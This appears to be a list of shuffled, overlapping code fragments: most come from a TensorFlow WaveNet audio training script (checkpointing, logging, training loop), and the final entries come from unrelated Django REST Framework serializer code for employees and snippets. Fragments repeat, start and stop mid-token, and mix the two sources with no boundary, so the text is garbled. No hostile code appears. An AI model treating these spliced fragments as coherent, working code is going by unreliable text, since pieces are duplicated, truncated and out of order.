"quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False, global_condition_channels=None, global_condition_cardinality=None) optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=1e-4, epsilon=1e-4) train(args, model,",
"float = 1e-4 max_to_keep: int = 5 store_metadata: bool = False l2_regularization_strength: float",
"after ^C is displayed so save message # is on its own line.",
"= tf.compat.v1.global_variables_initializer() sess.run(init) sess.run(iterator.initializer) # Saver for storing checkpoints of the model. saver",
"step % 50 == 0: # Slow run that stores extra information for",
"os.path.join(logdir_root, 'train', STARTED_DATESTRING) return logdir if __name__ == '__main__': args = TrainParams() with",
"tqdm( total=total, initial=saved_global_step + 1, desc=f'train (epoch-size={epoch_size}, #epoch={total // epoch_size})') for step in",
"optim = optimizer.minimize(loss, var_list=trainable) # Set up logging for TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir)",
"== 0: args.l2_regularization_strength = None loss = net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable = tf.compat.v1.trainable_variables()",
"args.log_dir, step) last_saved_step = step except KeyboardInterrupt: # Introduce a line break after",
"= 1e-4 max_to_keep: int = 5 store_metadata: bool = False l2_regularization_strength: float =",
"#epoch={total // epoch_size})') for step in range(saved_global_step + 1, args.num_steps): if args.store_metadata and",
"step was: {}\".format(global_step)) print(\" Restoring...\", end=\"\") saver.restore(sess, ckpt.model_checkpoint_path) print(\" Done.\") return global_step else:",
"= 5 def train(args: TrainParams, net, optimizer): # Load raw waveform from VCTK",
"as np import os import sys import time from datetime import datetime from",
"# Allow silence trimming to be skipped by specifying a threshold near dataset,",
"loss = net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable = tf.compat.v1.trainable_variables() optim = optimizer.minimize(loss, var_list=trainable) #",
"(~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__ import print_function import argparse import glob import",
"argparse import glob import json from dataclasses import dataclass import numpy as np",
"= tf.train.get_checkpoint_state(logdir) if ckpt: print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path)) global_step = int(ckpt.model_checkpoint_path .split('/')[-1] .split('-')[-1])",
"import timeline from tqdm.auto import tqdm from wavenet_tf import WaveNetModel, optimizer_factory from wavenet_tf.data_io",
"so save message # is on its own line. print() finally: if step",
"writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata = tf.compat.v1.RunMetadata() summaries = tf.compat.v1.summary.merge_all() # Set up session sess =",
"dataset, n_examples = get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size = n_examples // args.batch_size dataset =",
"run_metadata = tf.compat.v1.RunMetadata() summaries = tf.compat.v1.summary.merge_all() # Set up session sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False))",
"corpus, which can be freely downloaded at the following site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html",
"TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata = tf.compat.v1.RunMetadata() summaries = tf.compat.v1.summary.merge_all() # Set",
"= str(ROOT_DIR / \"logdir\") checkpoint_every: int = 1000 num_steps: int = int(1e5) batch_size:",
"total=total, initial=saved_global_step + 1, desc=f'train (epoch-size={epoch_size}, #epoch={total // epoch_size})') for step in range(saved_global_step",
"= os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path, 'w') as f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else: summary, loss_value, _",
"= 1000 num_steps: int = int(1e5) batch_size: int = 1 sample_size: int =",
"run_metadata=run_metadata) writer.add_summary(summary, step) writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir, 'timeline.trace') with",
"can be freely downloaded at the following site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from",
"loss_value, _ = sess.run([summaries, loss, optim]) writer.add_summary(summary, step) pbar.update(1) pbar.set_postfix(step=step, loss=loss_value, epoch=step //",
"model_name = 'model.ckpt' checkpoint_path = os.path.join(logdir, model_name) print('Storing checkpoint to {} ...'.format(logdir), end=\"\")",
"= tf.compat.v1.RunMetadata() summaries = tf.compat.v1.summary.merge_all() # Set up session sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init",
"end=\"\") ckpt = tf.train.get_checkpoint_state(logdir) if ckpt: print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path)) global_step = int(ckpt.model_checkpoint_path",
"1000 num_steps: int = int(1e5) batch_size: int = 1 sample_size: int = 100000",
"__name__ == '__main__': args = TrainParams() with open('./data/tf_wavenet_params.json', 'r') as f: wavenet_params =",
"None loss = net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable = tf.compat.v1.trainable_variables() optim = optimizer.minimize(loss, var_list=trainable)",
"writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path, 'w') as",
"saved_global_step = load(saver, sess, args.log_dir) if saved_global_step is None: # The first training",
"dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False, global_condition_channels=None, global_condition_cardinality=None) optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=1e-4, epsilon=1e-4)",
"residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False, global_condition_channels=None, global_condition_cardinality=None) optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=1e-4,",
"args.log_dir) if saved_global_step is None: # The first training step will be saved_global_step",
"site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__ import print_function import argparse import glob",
"optim], options=run_options, run_metadata=run_metadata) writer.add_summary(summary, step) writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir,",
"os.path.join(logdir, model_name) print('Storing checkpoint to {} ...'.format(logdir), end=\"\") sys.stdout.flush() if not os.path.exists(logdir): os.makedirs(logdir)",
"return None def get_default_logdir(logdir_root): logdir = os.path.join(logdir_root, 'train', STARTED_DATESTRING) return logdir if __name__",
"loss, optim]) writer.add_summary(summary, step) pbar.update(1) pbar.set_postfix(step=step, loss=loss_value, epoch=step // epoch_size) if step >",
"// args.batch_size dataset = dataset.repeat().batch(args.batch_size) iterator = tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch = iterator.get_next() if args.l2_regularization_strength",
"print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path)) global_step = int(ckpt.model_checkpoint_path .split('/')[-1] .split('-')[-1]) print(\" Global step was:",
"50 == 0: # Slow run that stores extra information for debugging. print('Storing",
"0 and step % args.checkpoint_every == 0: save(saver, sess, args.log_dir, step) last_saved_step =",
"print('Storing metadata') run_options = tf.RunOptions( trace_level=tf.RunOptions.FULL_TRACE) summary, loss_value, _ = sess.run( [summaries, loss,",
"if step > 0 and step % args.checkpoint_every == 0: save(saver, sess, args.log_dir,",
"end=\"\") saver.restore(sess, ckpt.model_checkpoint_path) print(\" Done.\") return global_step else: print(\" No checkpoint found.\") return",
"tqdm.auto import tqdm from wavenet_tf import WaveNetModel, optimizer_factory from wavenet_tf.data_io import get_train_dataset ROOT_DIR",
"tensorflow as tf from tensorflow.python.client import timeline from tqdm.auto import tqdm from wavenet_tf",
"if args.l2_regularization_strength == 0: args.l2_regularization_strength = None loss = net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable",
"1, args.num_steps): if args.store_metadata and step % 50 == 0: # Slow run",
"print(\" Done.\") return global_step else: print(\" No checkpoint found.\") return None def get_default_logdir(logdir_root):",
"model.\") raise step = None last_saved_step = saved_global_step try: total = args.num_steps -",
"pbar.update(1) pbar.set_postfix(step=step, loss=loss_value, epoch=step // epoch_size) if step > 0 and step %",
"= int(1e5) batch_size: int = 1 sample_size: int = 100000 learning_rate: float =",
"None last_saved_step = saved_global_step try: total = args.num_steps - saved_global_step - 1 pbar",
"here for new or overwritten trainings. saved_global_step = -1 except: print(\"Something went wrong",
"network with the WaveNet using data from the VCTK corpus, which can be",
"args.num_steps - saved_global_step - 1 pbar = tqdm( total=total, initial=saved_global_step + 1, desc=f'train",
"checkpoints from {} ...\".format(logdir), end=\"\") ckpt = tf.train.get_checkpoint_state(logdir) if ckpt: print(\" Checkpoint found:",
"// epoch_size) if step > 0 and step % args.checkpoint_every == 0: save(saver,",
"last_saved_step = saved_global_step try: total = args.num_steps - saved_global_step - 1 pbar =",
"own line. print() finally: if step > last_saved_step: save(saver, sess, args.log_dir, step) def",
"storing checkpoints of the model. saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints) try: saved_global_step = load(saver,",
"open(timeline_path, 'w') as f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else: summary, loss_value, _ = sess.run([summaries, loss, optim])",
"= get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size = n_examples // args.batch_size dataset = dataset.repeat().batch(args.batch_size) iterator",
"from the VCTK corpus, which can be freely downloaded at the following site",
"print(\"Trying to restore saved checkpoints from {} ...\".format(logdir), end=\"\") ckpt = tf.train.get_checkpoint_state(logdir) if",
"= tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints) try: saved_global_step = load(saver, sess, args.log_dir) if saved_global_step is None:",
"import os import sys import time from datetime import datetime from pathlib import",
"which can be freely downloaded at the following site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\"",
"> 0 and step % args.checkpoint_every == 0: save(saver, sess, args.log_dir, step) last_saved_step",
"import WaveNetModel, optimizer_factory from wavenet_tf.data_io import get_train_dataset ROOT_DIR = Path(os.path.abspath(__file__)).parent.parent STARTED_DATESTRING = \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now())",
"= dataset.repeat().batch(args.batch_size) iterator = tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch = iterator.get_next() if args.l2_regularization_strength == 0: args.l2_regularization_strength",
"the following site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__ import print_function import argparse",
"step) def save(saver, sess, logdir, step): model_name = 'model.ckpt' checkpoint_path = os.path.join(logdir, model_name)",
"else: print(\" No checkpoint found.\") return None def get_default_logdir(logdir_root): logdir = os.path.join(logdir_root, 'train',",
"sys import time from datetime import datetime from pathlib import Path import tensorflow",
"from {} ...\".format(logdir), end=\"\") ckpt = tf.train.get_checkpoint_state(logdir) if ckpt: print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path))",
"step) last_saved_step = step except KeyboardInterrupt: # Introduce a line break after ^C",
"print(\"Something went wrong while restoring checkpoint. \" \"We will terminate training to avoid",
"VCTK corpus, which can be freely downloaded at the following site (~10 GB):",
"= 0.0 max_checkpoints: int = 5 def train(args: TrainParams, net, optimizer): # Load",
"writer.add_summary(summary, step) pbar.update(1) pbar.set_postfix(step=step, loss=loss_value, epoch=step // epoch_size) if step > 0 and",
"run that stores extra information for debugging. print('Storing metadata') run_options = tf.RunOptions( trace_level=tf.RunOptions.FULL_TRACE)",
"step): model_name = 'model.ckpt' checkpoint_path = os.path.join(logdir, model_name) print('Storing checkpoint to {} ...'.format(logdir),",
"from wavenet_tf import WaveNetModel, optimizer_factory from wavenet_tf.data_io import get_train_dataset ROOT_DIR = Path(os.path.abspath(__file__)).parent.parent STARTED_DATESTRING",
"from __future__ import print_function import argparse import glob import json from dataclasses import",
"summaries = tf.compat.v1.summary.merge_all() # Set up session sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init = tf.compat.v1.global_variables_initializer()",
"get_default_logdir(logdir_root): logdir = os.path.join(logdir_root, 'train', STARTED_DATESTRING) return logdir if __name__ == '__main__': args",
"Set up logging for TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata = tf.compat.v1.RunMetadata() summaries",
"== 0: save(saver, sess, args.log_dir, step) last_saved_step = step except KeyboardInterrupt: # Introduce",
"args.log_dir, step) def save(saver, sess, logdir, step): model_name = 'model.ckpt' checkpoint_path = os.path.join(logdir,",
"if ckpt: print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path)) global_step = int(ckpt.model_checkpoint_path .split('/')[-1] .split('-')[-1]) print(\" Global",
"int = 100000 learning_rate: float = 1e-4 max_to_keep: int = 5 store_metadata: bool",
"def get_default_logdir(logdir_root): logdir = os.path.join(logdir_root, 'train', STARTED_DATESTRING) return logdir if __name__ == '__main__':",
"sess, logdir, step): model_name = 'model.ckpt' checkpoint_path = os.path.join(logdir, model_name) print('Storing checkpoint to",
"skipped by specifying a threshold near dataset, n_examples = get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size",
"overwritten trainings. saved_global_step = -1 except: print(\"Something went wrong while restoring checkpoint. \"",
"sess, args.log_dir) if saved_global_step is None: # The first training step will be",
"int = int(1e5) batch_size: int = 1 sample_size: int = 100000 learning_rate: float",
"timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path, 'w') as f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else: summary,",
"print(' Done.') def load(saver, sess, logdir): print(\"Trying to restore saved checkpoints from {}",
"is on its own line. print() finally: if step > last_saved_step: save(saver, sess,",
"sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init = tf.compat.v1.global_variables_initializer() sess.run(init) sess.run(iterator.initializer) # Saver for storing checkpoints",
"0: save(saver, sess, args.log_dir, step) last_saved_step = step except KeyboardInterrupt: # Introduce a",
"be saved_global_step + 1, # therefore we put -1 here for new or",
"and step % 50 == 0: # Slow run that stores extra information",
"global_step=step) print(' Done.') def load(saver, sess, logdir): print(\"Trying to restore saved checkpoints from",
"'train', STARTED_DATESTRING) return logdir if __name__ == '__main__': args = TrainParams() with open('./data/tf_wavenet_params.json',",
"l2_regularization_strength: float = 0.0 max_checkpoints: int = 5 def train(args: TrainParams, net, optimizer):",
"terminate training to avoid accidentally overwriting \" \"the previous model.\") raise step =",
"not os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path, global_step=step) print(' Done.') def load(saver, sess, logdir): print(\"Trying",
"be freely downloaded at the following site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__",
"dataset = dataset.repeat().batch(args.batch_size) iterator = tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch = iterator.get_next() if args.l2_regularization_strength == 0:",
"1, # therefore we put -1 here for new or overwritten trainings. saved_global_step",
"^C is displayed so save message # is on its own line. print()",
"max_to_keep: int = 5 store_metadata: bool = False l2_regularization_strength: float = 0.0 max_checkpoints:",
"None: # The first training step will be saved_global_step + 1, # therefore",
"restore saved checkpoints from {} ...\".format(logdir), end=\"\") ckpt = tf.train.get_checkpoint_state(logdir) if ckpt: print(\"",
"'__main__': args = TrainParams() with open('./data/tf_wavenet_params.json', 'r') as f: wavenet_params = json.load(f) model",
"model. saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints) try: saved_global_step = load(saver, sess, args.log_dir) if saved_global_step",
"def train(args: TrainParams, net, optimizer): # Load raw waveform from VCTK corpus. with",
"tf.compat.v1.RunMetadata() summaries = tf.compat.v1.summary.merge_all() # Set up session sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init =",
"checkpoint_path = os.path.join(logdir, model_name) print('Storing checkpoint to {} ...'.format(logdir), end=\"\") sys.stdout.flush() if not",
"= timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path, 'w') as f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else:",
"load(saver, sess, args.log_dir) if saved_global_step is None: # The first training step will",
"str(ROOT_DIR / \"logdir\") checkpoint_every: int = 1000 num_steps: int = int(1e5) batch_size: int",
"var_list=trainable) # Set up logging for TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata =",
"dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False, global_condition_channels=None, global_condition_cardinality=None) optimizer",
"= WaveNetModel( batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False,",
"bool = False l2_regularization_strength: float = 0.0 max_checkpoints: int = 5 def train(args:",
"saved_global_step = -1 except: print(\"Something went wrong while restoring checkpoint. \" \"We will",
"writer.add_summary(summary, step) writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path,",
"following site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__ import print_function import argparse import",
"Introduce a line break after ^C is displayed so save message # is",
"'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path, 'w') as f:",
"the VCTK corpus, which can be freely downloaded at the following site (~10",
"trimming to be skipped by specifying a threshold near dataset, n_examples = get_train_dataset(os.path.join(args.data_dir,",
"WaveNetModel( batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False, global_condition_channels=None,",
"= None loss = net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable = tf.compat.v1.trainable_variables() optim = optimizer.minimize(loss,",
"avoid accidentally overwriting \" \"the previous model.\") raise step = None last_saved_step =",
"datetime import datetime from pathlib import Path import tensorflow as tf from tensorflow.python.client",
"except KeyboardInterrupt: # Introduce a line break after ^C is displayed so save",
"+ 1, # therefore we put -1 here for new or overwritten trainings.",
"0: # Slow run that stores extra information for debugging. print('Storing metadata') run_options",
"raise step = None last_saved_step = saved_global_step try: total = args.num_steps - saved_global_step",
"optimizer.minimize(loss, var_list=trainable) # Set up logging for TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata",
"int(1e5) batch_size: int = 1 sample_size: int = 100000 learning_rate: float = 1e-4",
"args.batch_size dataset = dataset.repeat().batch(args.batch_size) iterator = tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch = iterator.get_next() if args.l2_regularization_strength ==",
"init = tf.compat.v1.global_variables_initializer() sess.run(init) sess.run(iterator.initializer) # Saver for storing checkpoints of the model.",
"metadata') run_options = tf.RunOptions( trace_level=tf.RunOptions.FULL_TRACE) summary, loss_value, _ = sess.run( [summaries, loss, optim],",
"[summaries, loss, optim], options=run_options, run_metadata=run_metadata) writer.add_summary(summary, step) writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats) timeline_path",
"pathlib import Path import tensorflow as tf from tensorflow.python.client import timeline from tqdm.auto",
"step % args.checkpoint_every == 0: save(saver, sess, args.log_dir, step) last_saved_step = step except",
"datetime from pathlib import Path import tensorflow as tf from tensorflow.python.client import timeline",
"with tf.name_scope('create_inputs'): # Allow silence trimming to be skipped by specifying a threshold",
"= tqdm( total=total, initial=saved_global_step + 1, desc=f'train (epoch-size={epoch_size}, #epoch={total // epoch_size})') for step",
"if saved_global_step is None: # The first training step will be saved_global_step +",
"Checkpoint found: {}\".format(ckpt.model_checkpoint_path)) global_step = int(ckpt.model_checkpoint_path .split('/')[-1] .split('-')[-1]) print(\" Global step was: {}\".format(global_step))",
"/ 'fma_small_25_16000') log_dir: str = str(ROOT_DIR / \"logdir\") checkpoint_every: int = 1000 num_steps:",
"summary, loss_value, _ = sess.run([summaries, loss, optim]) writer.add_summary(summary, step) pbar.update(1) pbar.set_postfix(step=step, loss=loss_value, epoch=step",
"return global_step else: print(\" No checkpoint found.\") return None def get_default_logdir(logdir_root): logdir =",
"sess.run(iterator.initializer) # Saver for storing checkpoints of the model. saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints)",
"// epoch_size})') for step in range(saved_global_step + 1, args.num_steps): if args.store_metadata and step",
"# Introduce a line break after ^C is displayed so save message #",
"the VCTK corpus. This script trains a network with the WaveNet using data"
] |
[
"title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField(",
"choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create and return a",
"= validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks =",
"= serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES,",
"a serializer for the models so that state of model objects can be",
"SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet fields = \"__all__\"",
"for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands fields = '__all__'",
"Meta: model = Snippet fields = \"__all__\" # creating a serializer for Roles",
"serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation for employee_name",
"be converted into a native python datatypes that can be easily rendered into",
"= '__all__' # creating serializer for list of all the names of employee",
"validate_data): '''create and return a new Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance, validate_data):",
"slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation for employee_name field",
"= \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self, validate_data):",
"validation for employee_name field that it should contain mr or mrs def validate_employee_name(self,",
"instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user):",
"def create(self, validate_data): '''create and return a new Snippet''' return Snippet.objects.create(**validate_data) def update(self,",
"getting details of all the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value)",
"default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create and return a new",
"# creating a serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model =",
"serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data):",
"so that state of model objects can be converted into a native python",
"model objects can be converted into a native python datatypes that can be",
"= serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style =",
"= Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100)",
"= \"__all__\" # creating a serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta:",
"= validate_data.get('style', instance.style) instance.save() return instance # SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class",
"and return a new Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update",
"if len(value) != 10: raise serializers.ValidationError( \" contact should contain 10 digits only\")",
"model = CarBrands fields = '__all__' # creating serializer for list of all",
"# SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code",
"all the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value) != 10: raise",
"language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create",
"value): a = \"mr\" if a not in value.lower(): raise serializers.ValidationError( 'this employee",
"for Snippet model # SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title",
"def update(self, instance, validate_data): ''' Update and return an existing snippet''' instance.designation_name =",
"len(value) != 10: raise serializers.ValidationError( \" contact should contain 10 digits only\") designations",
"instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style)",
"import serializers from .models import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks",
"models so that state of model objects can be converted into a native",
"designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self, validate_data): '''create and return a",
"for getting details of all the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if",
"instance.style) instance.save() return instance # SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model",
"= serializers.CharField(validators=[length]) # validation for employee_name field that it should contain mr or",
"'__all__' # creating serializer for list of all the names of employee in",
"a not in value.lower(): raise serializers.ValidationError( 'this employee name should contain Mr or",
"serializers.ValidationError( \" contact should contain 10 digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True)",
"Update and return an existing snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save() return",
"length(self, value): if len(value) != 10: raise serializers.ValidationError( \" contact should contain 10",
"class Meta: model = Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField(",
"class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value) != 10: raise serializers.ValidationError( \" contact",
"using 'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template':",
"[\"employee_name\"] # creating a serialzer for getting details of all the employees class",
"= \"mr\" if a not in value.lower(): raise serializers.ValidationError( 'this employee name should",
"into JSON,XML''' from rest_framework import serializers from .models import CarBrands, EmployeeDesignations, Employees, Snippet,",
"'''create and return a new Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance, validate_data): '''",
"native python datatypes that can be easily rendered into JSON,XML''' from rest_framework import",
"in value.lower(): raise serializers.ValidationError( 'this employee name should contain Mr or Mrs') return",
"CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating a serializer for",
"Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees fields = [\"employee_name\"] # creating",
"raise serializers.ValidationError( 'this employee name should contain Mr or Mrs') return value class",
"create(self, validate_data): '''create and return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance,",
"style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create and return a new Snippet'''",
"EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self, validate_data): '''create and return",
"converted into a native python datatypes that can be easily rendered into JSON,XML'''",
"should contain Mr or Mrs') return value class Meta: model = Employees fields",
"= validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style) instance.save() return",
"can be converted into a native python datatypes that can be easily rendered",
"= validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style =",
